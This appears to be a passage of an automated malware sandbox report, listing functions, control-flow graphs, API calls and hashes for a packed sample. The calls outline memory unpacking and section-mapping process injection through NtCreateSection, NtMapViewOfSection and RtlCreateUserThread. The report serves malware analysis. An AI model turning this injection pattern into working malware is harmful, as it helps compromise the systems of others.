                                              • Instruction Fuzzy Hash: F6F06232540B156BD7203BB59C8DB6A7BE8BF49764F101528E642915C0DA70EC464665
                                              Function 0055003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 55003c-550047 1 55004c-550263 call 550a3f call 550e0f call 550d90 VirtualAlloc 0->1 2 550049 0->2 17 550265-550289 call 550a69 1->17 18 55028b-550292 1->18 2->1 23 5502ce-5503c2 VirtualProtect call 550cce call 550ce7 17->23 20 5502a1-5502b0 18->20 22 5502b2-5502cc 20->22 20->23 22->20 29 5503d1-5503e0 23->29 30 5503e2-550437 call 550ce7 29->30 31 550439-5504b8 VirtualFree 29->31 30->29 33 5505f4-5505fe 31->33 34 5504be-5504cd 31->34 35 550604-55060d 33->35 36 55077f-550789 33->36 38 5504d3-5504dd 34->38 35->36 39 550613-550637 35->39 42 5507a6-5507b0 36->42 43 55078b-5507a3 36->43 38->33 41 5504e3-550505 38->41 46 55063e-550648 39->46 50 550517-550520 41->50 51 550507-550515 41->51 44 5507b6-5507cb 42->44 45 55086e-5508be LoadLibraryA 42->45 43->42 47 5507d2-5507d5 44->47 55 5508c7-5508f9 45->55 46->36 48 55064e-55065a 46->48 52 550824-550833 47->52 53 5507d7-5507e0 47->53 48->36 54 550660-55066a 48->54 56 550526-550547 50->56 51->56 60 550839-55083c 52->60 57 5507e4-550822 53->57 58 5507e2 53->58 59 55067a-550689 54->59 61 550902-55091d 55->61 62 5508fb-550901 55->62 63 55054d-550550 56->63 57->47 58->52 64 550750-55077a 59->64 65 55068f-5506b2 59->65 60->45 66 55083e-550847 60->66 62->61 68 550556-55056b 63->68 69 5505e0-5505ef 63->69 64->46 70 5506b4-5506ed 65->70 71 5506ef-5506fc 65->71 72 550849 66->72 73 55084b-55086c 66->73 74 55056d 68->74 75 55056f-55057a 68->75 69->38 70->71 76 5506fe-550748 71->76 77 55074b 71->77 72->45 73->60 74->69 78 55057c-550599 75->78 79 55059b-5505bb 75->79 76->77 77->59 84 5505bd-5505db 78->84 79->84 84->63
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0055024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_550000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: 45bb27c3125b16f6db0b06f06b814a4eb305919380205288ee8db3488fa42a7c
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: 39526C74A00229DFDB64CF58C995BA8BBB1BF09305F1480DAE94DA7351DB30AE89DF14
                                              Function 00550E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 241 550e0f-550e24 SetErrorMode * 2 242 550e26 241->242 243 550e2b-550e2c 241->243 242->243
                                              APIs
                                              • SetErrorMode.KERNELBASE(00000400,?,?,00550223,?,?), ref: 00550E19
                                              • SetErrorMode.KERNELBASE(00000000,?,?,00550223,?,?), ref: 00550E1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_550000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: 59f4f3660f24c022e483895a9ce12252ed7c3a0652483bba4d3b890b59234470
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: 8AD0123114512877D7002AD4DC09BCD7F1CDF05B63F108411FB0DD9080C770994046E5
                                              Function 00401919 Relevance: 1.3, APIs: 1, Instructions: 79sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 244 401919-40191a 245 401969-4019c5 call 401207 Sleep call 401482 244->245 246 40191d-401956 call 401207 244->246 267 4019d4-401a19 245->267 268 4019c7-4019cf call 401583 245->268 278 401a1c-401a25 call 401207 267->278 279 401a0f-401a15 267->279 268->267 279->278
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                              • Instruction ID: 49835af623e861a6f2ddbc0bf662c5c40176c384461ea98b099af7f339eb22c4
                                              • Opcode Fuzzy Hash: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                              • Instruction Fuzzy Hash: 7911DCB234C201EBD6009A84A862E7A3214AB51359F304537FA57B90F2D57D9A13F76F
                                              Function 00401959 Relevance: 1.3, APIs: 1, Instructions: 66sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 282 401959-4019c5 call 401207 Sleep call 401482 296 4019d4-401a19 282->296 297 4019c7-4019cf call 401583 282->297 307 401a1c-401a25 call 401207 296->307 308 401a0f-401a15 296->308 297->296 308->307
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                              • Instruction ID: 220a72f44c34cad911d214d6bf830d158092726683e2111099ccb198781fee4b
                                              • Opcode Fuzzy Hash: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                              • Instruction Fuzzy Hash: 1311BCB1648204FADA009A849C62E7A3228AB41754F204137BA47B90F1C57DA913EAAF
                                              Function 00401970 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 311 401970-4019c5 call 401207 Sleep call 401482 323 4019d4-401a19 311->323 324 4019c7-4019cf call 401583 311->324 334 401a1c-401a25 call 401207 323->334 335 401a0f-401a15 323->335 324->323 335->334
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                              • Instruction ID: edf3ac2f4a0a3dadc82130375ffc9a201d65d5ca35b25829e414e95522c05f9b
                                              • Opcode Fuzzy Hash: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                              • Instruction Fuzzy Hash: AA01C0B174C104EBDB009A84DC62E7A3214AF41704F204537BA57B91F1C53EAA23FB5B
                                              Function 00401977 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 338 401977-4019c5 call 401207 Sleep call 401482 347 4019d4-401a19 338->347 348 4019c7-4019cf call 401583 338->348 358 401a1c-401a25 call 401207 347->358 359 401a0f-401a15 347->359 348->347 359->358
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                              • Instruction ID: c889a794982209429869940d23560ef391d683eb1520a1ae8baa03dfc3eb9000
                                              • Opcode Fuzzy Hash: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                              • Instruction Fuzzy Hash: E601E1B1308100EBD7009B849C51ABA3614AF41314F20413BB957790E2C53EAA22EB5B
                                              Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 362 401987-4019c5 call 401207 Sleep call 401482 373 4019d4-401a19 362->373 374 4019c7-4019cf call 401583 362->374 384 401a1c-401a25 call 401207 373->384 385 401a0f-401a15 373->385 374->373 385->384
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                              • Instruction ID: 1aa0efa7bda459d32f82bf33ce90feabc7a2b43109eca8adeaaf204144b81d62
                                              • Opcode Fuzzy Hash: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                              • Instruction Fuzzy Hash: C201C0B1708104EBDB009A84DC62E7A3214AF41714F204137BA57791F1C53EAA23FB5B
                                              Function 0040198A Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 388 40198a-40199d 389 4019a8-4019c5 Sleep call 401482 388->389 390 4019a2 call 401207 388->390 393 4019d4-401a19 389->393 394 4019c7-4019cf call 401583 389->394 390->389 404 401a1c-401a25 call 401207 393->404 405 401a0f-401a15 393->405 394->393 405->404
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                              • Instruction ID: 93e9f4b763319a312fe66b3304ba82e0c9e14e36225fd67d869cb8e68c59c211
                                              • Opcode Fuzzy Hash: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                              • Instruction Fuzzy Hash: 5501B572308244EBDB019F90DC92EAE3728AF45318F24017BB557790E2C53DA912EB1B
                                              Function 00531946 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 408 531946-531980 call 531c59 411 531982-5319b5 VirtualAlloc call 5319d3 408->411 412 5319ce 408->412 414 5319ba-5319cc 411->414 412->412 414->412
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00531997
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768955297.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_520000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: d3b36b3d9baeb5794ffd6da86aef9884ceafb4e2bf236d1f2d357f08bb52a105
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: 89113C79A00208EFDB01DF98C989E99BFF5AF08351F0580A5F9489B362D371EA50DF84

                                              Non-executed Functions

                                              Function 0055092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_550000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$GetProcAddress.$l
                                              • API String ID: 0-2784972518
                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction ID: a0d7601ad3be0be9ca7345b1b9b156f71840a4e34a964fc1e8f9d03f8084ce82
                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction Fuzzy Hash: 483179B6900609CFDB10CF99C880AAEBBF9FF48325F24504AD841A7351D771EA49CBA4
                                              Function 00402721 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #X%
                                              • API String ID: 0-730838689
                                              • Opcode ID: 245b7a6330694b5c367d3b257ccbe4366a0bf95add0a101e660e11a0368d02b9
                                              • Instruction ID: 71e09992ebba1ebce1a14e5228dc5e73fa07ad40964d1ad344f7d49068a62d69
                                              • Opcode Fuzzy Hash: 245b7a6330694b5c367d3b257ccbe4366a0bf95add0a101e660e11a0368d02b9
                                              • Instruction Fuzzy Hash: 2441DC352485539DC30299188E899EABF79FDC7398B10017ED8C2AB9D3CBA02517D3B6
                                              Function 00401A28 Relevance: .3, Instructions: 258COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 24dfe36045d0991ac749a0892ad312c9a4e30bcc45954bcab72f1b8cf2b0dd63
                                              • Instruction ID: 18334b27c1f95b13a70b5794667acb6e5ebe9408c321dbf9d60f89b0be35e569
                                              • Opcode Fuzzy Hash: 24dfe36045d0991ac749a0892ad312c9a4e30bcc45954bcab72f1b8cf2b0dd63
                                              • Instruction Fuzzy Hash: AA51AE612492109FE71989358C829B637219F43726F2C327FE98267EE6D379D4438A4A
                                              Function 00531564 Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768955297.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_520000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction ID: 26bc10cb75916793da9d8b96670eda41be48f5ec240f76cdadba6e69c5e4a327
                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction Fuzzy Hash: 8511AC72340500AFD750CF69DCC1FA277EAFB88320B298065ED06CB316E675E802CB64
                                              Function 00550D90 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_550000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction ID: 714e70d2f4900003e1559038d9d578e80d48b8cbfd1985c0913e936ce88b802b
                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction Fuzzy Hash: E801DF72A006008FDB21DF60C825BAA37B9FB86306F1544A6D90A97282E370A8498B80

                                              Execution Graph

                                              Execution Coverage:8.7%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:107
                                              Total number of Limit Nodes:3
                                              execution_graph 2768 6214e7 2769 6214f6 2768->2769 2772 621c87 2769->2772 2778 621ca2 2772->2778 2773 621cab CreateToolhelp32Snapshot 2774 621cc7 Module32First 2773->2774 2773->2778 2775 621cd6 2774->2775 2776 6214ff 2774->2776 2779 621946 2775->2779 2778->2773 2778->2774 2780 621971 2779->2780 2781 621982 VirtualAlloc 2780->2781 2782 6219ba 2780->2782 2781->2782 2782->2782 2805 56003c 2806 560049 2805->2806 2818 560e0f SetErrorMode SetErrorMode 2806->2818 2811 560265 2812 5602ce VirtualProtect 2811->2812 2814 56030b 2812->2814 2813 560439 VirtualFree 2817 5604be LoadLibraryA 2813->2817 2814->2813 2816 5608c7 2817->2816 2819 560223 2818->2819 2820 560d90 2819->2820 2821 560dad 2820->2821 2822 560dbb GetPEB 2821->2822 2823 560238 VirtualAlloc 2821->2823 2822->2823 2823->2811 2899 40198a 2900 4019a8 Sleep 2899->2900 2901 401207 2899->2901 2902 4019c3 2900->2902 2901->2900 2903 401583 7 API calls 2902->2903 2904 4019d4 2902->2904 2903->2904 2905 40158e 2906 4015bf 2905->2906 2907 401634 NtDuplicateObject 2906->2907 2914 401750 2906->2914 2908 401651 NtCreateSection 2907->2908 2907->2914 2909 4016d1 NtCreateSection 2908->2909 2910 401677 NtMapViewOfSection 2908->2910 2912 4016fd 2909->2912 2909->2914 2910->2909 2911 40169a NtMapViewOfSection 2910->2911 2911->2909 2913 4016b8 2911->2913 2912->2914 2915 401707 NtMapViewOfSection 2912->2915 2913->2909 2915->2914 2916 40172e NtMapViewOfSection 2915->2916 2916->2914 2824 402e50 2825 402e54 2824->2825 2826 402fa8 2825->2826 2827 401959 8 API calls 2825->2827 2827->2826 2874 401970 2875 401975 2874->2875 2876 4019a8 Sleep 2875->2876 2877 4019c3 2876->2877 2878 401583 7 API calls 2877->2878 2879 4019d4 2877->2879 2878->2879 2832 560005 2837 56092b GetPEB 2832->2837 2834 560030 2839 56003c 2834->2839 2838 560972 2837->2838 2838->2834 2840 560049 2839->2840 2841 560e0f 2 API calls 2840->2841 2842 560223 2841->2842 2843 560d90 GetPEB 2842->2843 2844 560238 VirtualAlloc 2843->2844 2845 560265 2844->2845 2846 5602ce VirtualProtect 2845->2846 2848 56030b 2846->2848 2847 560439 VirtualFree 2851 5604be LoadLibraryA 2847->2851 2848->2847 2850 5608c7 2851->2850 2764 403054 2765 403197 2764->2765 2766 40307e 2764->2766 2766->2765 2767 403139 RtlCreateUserThread NtTerminateProcess 2766->2767 2767->2765 2783 402f17 2784 402f1c 2783->2784 2786 402fa8 2784->2786 2787 401959 2784->2787 2788 401968 2787->2788 2789 4019a8 Sleep 2788->2789 2790 4019c3 2789->2790 2792 4019d4 2790->2792 2793 401583 2790->2793 2792->2786 2794 401594 2793->2794 2795 401634 NtDuplicateObject 2794->2795 2802 401750 2794->2802 2796 401651 NtCreateSection 2795->2796 2795->2802 2797 4016d1 NtCreateSection 2796->2797 2798 401677 NtMapViewOfSection 2796->2798 2800 4016fd 2797->2800 2797->2802 2798->2797 2799 40169a NtMapViewOfSection 2798->2799 2799->2797 2801 4016b8 2799->2801 2800->2802 2803 401707 NtMapViewOfSection 2800->2803 2801->2797 2802->2792 2803->2802 2804 40172e NtMapViewOfSection 2803->2804 2804->2802 2852 560001 2853 560005 2852->2853 2854 56092b GetPEB 2853->2854 2855 560030 2854->2855 2856 56003c 7 API calls 2855->2856 2857 560038 2856->2857 2886 401919 2887 401969 2886->2887 2888 40191d 2886->2888 2889 4019a8 Sleep 2887->2889 2890 4019c3 2889->2890 2891 401583 7 API calls 2890->2891 2892 4019d4 2890->2892 2891->2892

                                              Executed Functions

                                              Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 203nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 85 401583-4015de call 401207 97 4015e0 85->97 98 4015e3-4015e8 85->98 97->98 100 401909-401911 98->100 101 4015ee-4015ff 98->101 100->98 104 401916-401956 call 401207 100->104 105 401605-40162e 101->105 106 401907 101->106 105->106 113 401634-40164b NtDuplicateObject 105->113 106->104 113->106 115 401651-401675 NtCreateSection 113->115 117 4016d1-4016f7 NtCreateSection 115->117 118 401677-401698 NtMapViewOfSection 115->118 117->106 122 4016fd-401701 117->122 118->117 120 40169a-4016b6 NtMapViewOfSection 118->120 120->117 123 4016b8-4016ce 120->123 122->106 125 401707-401728 NtMapViewOfSection 122->125 123->117 125->106 127 40172e-40174a NtMapViewOfSection 125->127 127->106 130 401750 127->130 130->106 131 401750 call 401755 130->131 131->106
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                              • Instruction ID: f2d5e20ae79a609852431105b0704d648b73f45673a5aa535929140ce5e9a1ec
                                              • Opcode Fuzzy Hash: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                              • Instruction Fuzzy Hash: 42614DB0900209FFEB218F91CC48FAF7BB8EF85710F10012AF952BA1E5D6749941DB25
                                              Function 0040158E Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 132 40158e-4015b6 133 4015c8 132->133 134 4015bf-4015de call 401207 132->134 133->134 138 4015e0 134->138 139 4015e3-4015e8 134->139 138->139 141 401909-401911 139->141 142 4015ee-4015ff 139->142 141->139 145 401916-401956 call 401207 141->145 146 401605-40162e 142->146 147 401907 142->147 146->147 154 401634-40164b NtDuplicateObject 146->154 147->145 154->147 156 401651-401675 NtCreateSection 154->156 158 4016d1-4016f7 NtCreateSection 156->158 159 401677-401698 NtMapViewOfSection 156->159 158->147 163 4016fd-401701 158->163 159->158 161 40169a-4016b6 NtMapViewOfSection 159->161 161->158 164 4016b8-4016ce 161->164 163->147 166 401707-401728 NtMapViewOfSection 163->166 164->158 166->147 168 40172e-40174a NtMapViewOfSection 166->168 168->147 171 401750 168->171 171->147 172 401750 call 401755 171->172 172->147
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                              • Instruction ID: 0dfbee2a1f0830b6acdc9e972913786be015a59f94024eee438c43ca1dd55f4f
                                              • Opcode Fuzzy Hash: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
